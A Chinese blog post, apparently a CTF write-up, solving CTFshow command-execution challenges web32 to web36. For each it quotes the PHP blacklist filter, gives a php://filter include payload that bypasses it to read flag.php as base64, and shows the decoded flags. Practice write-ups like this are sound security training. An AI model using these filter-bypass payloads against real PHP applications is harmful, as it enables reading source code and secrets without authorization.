-
CTFshow 命令执行 web32 33 34 35 36
目录
web32
代码分析:
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c))这一题过滤的更多了,甚至连分号/左括号都过滤掉了,这时候可以尝试使用文件包含+php协议来做
payload:
?c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
结果将返回将源代码进行base64加密的字符串
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDA6NDk6MjYNCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7ODkyMDRlYzMtZDAzNS00M2QzLTk5ZTUtMmI2MzkyOTg3Y2JkfSI7DQo=
然后我们用在线工具进行解密
flag:
ctfshow{89204ec3-d035-43d3-99e5-2b6392987cbd}
ps:前面的几道题也可以使用文件包含做,但是没有什么必要
web33
代码分析:
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c))这道题与上一道题类似,也可以使用文件包含做
payload:
?c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
结果将返回将源代码进行base64加密的字符串
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDA6NDk6MjYNCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7ZmI5ZDEwZmMtNWE5Ni00NGY5LWExY2YtYmY1NWFmY2JhYTkwfSI7DQo=
然后我们用在线工具进行解密
flag:
ctfshow{fb9d10fc-5a96-44f9-a1cf-bf55afcbaa90}
web34
代码分析:
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c))跟前两题解法一样...
payload:
?c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
flag:
ctfshow{929704e2-7f4e-4303-b333-18e1a7e7bd6e}
web35
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c))跟前三题解法一样...
payload:
?c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
flag:
ctfshow{31fa949f-590e-46d5-a292-3656fabc7563}
web36
代码分析:
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c))跟前面四题解法类似,但是这里将数字过滤了,所以可以使用字符传参
payload:
?c=include$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php
flag:
ctfshow{6043cdb7-3e82-437f-bba3-7e3990480fec}
-
相关阅读:
51万奖池邀你参战——第二届阿里云ECS CloudBuild开发者大赛来袭
[AUTOSAR][诊断管理]什么是UDS诊断? 实现的方式是怎么样的?
聊聊ChatGLM-6B医疗数据微调
软考-高级-系统架构设计师教程(清华第2版)【第19章 大数据架构设计理论与实践 (P691~716)-思维导图】
【笔记篇】09仓管系统入库管理——之《实战供应链》
测试工程师提升方向,提升产品思维提高测试效率......
zabbix安装部署——RPM包安装
PHP基于thinkphp的旅游见闻管理系统#毕业设计
推荐两款超高质量的壁纸软件
SpringBoot+Vue实现前后端分离的4S店车辆管理系统
- 原文地址:https://blog.csdn.net/qq_40345591/article/details/127746265